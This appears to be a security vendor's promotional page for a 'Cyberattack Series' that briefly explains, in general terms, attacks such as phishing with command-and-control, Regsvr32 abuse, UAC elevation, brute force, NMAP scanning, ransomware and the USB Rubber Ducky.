Cyberattack Series: Security in Action
We're putting our cybersecurity to the test against real-world attack scenarios. Follow along now through November 12th for a behind the scenes look at our security experts and technology in action against these seven attacks:
To kick off the Cyberattack Series, we've combined Phishing and Command & Control. There's no doubt that you've experienced phishing, but what happens when the bad guy's attack is successful?
The next step can often be to establish a connection between your network and theirs with a technique called Command & Control (C2).
Regsvr32 is a command line utility for Windows OS and is a functionality that your adversaries may take advantage of to avoid triggering security tools. That's bad enough, but what happens after that? Windows User Account Control (UAC) allows programs to elevate their privileges to perform a task under admin-level permissions, and attackers can use this to their advantage as well.
A brute force attack is a trial and error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys, through exhaustive effort (using brute force) rather than employing intellectual strategies. Just as a criminal might break into, or "crack" a safe by trying many possible combinations, a brute force attacking application proceeds through all possible combinations of legal characters in sequence. Yikes, they must really want what you have!
NMAP (Network Mapper) is a network discovery, analysis, and auditing tool utilized by both network defenders and network attackers. This flexible tool has become a critically acclaimed and well-supported cyber tool. Using NMAP, we can perform network sweeps to discover available hosts on the network, effectively “mapping” the network topology. This would be great for auditing purposes, but also valuable information for a hacker. NMAP is also a port scanner, which allows network admins (and attackers) to identify open ports and running services on a network or individual critical systems.
The concept behind ransomware, a well-known form of malicious software, is quite simple: Lock and encrypt a victim’s computer data, then demand a ransom to restore access. In many cases, the victim must pay the cyber criminal within a set amount of time or risk losing access forever. Since we’re dealing with criminals here, paying the ransom doesn’t ensure access will be restored.
Ransomware is essentially the online form of the bully’s game of keep-away.
Imagine you could walk up to a computer, plug in a seemingly innocent USB drive, and have it install a backdoor, exfiltrate documents, steal passwords or any number of penetration testing tasks. All of these things can be done with many well-crafted keystrokes. If you could just sit in front of this computer, with photographic memory and perfect typing accuracy, you could do all of these things in just a few minutes.
The USB Rubber Ducky does this in seconds. It violates the inherent trust computers have in humans by posing as a keyboard - and injecting keystrokes at superhuman speeds.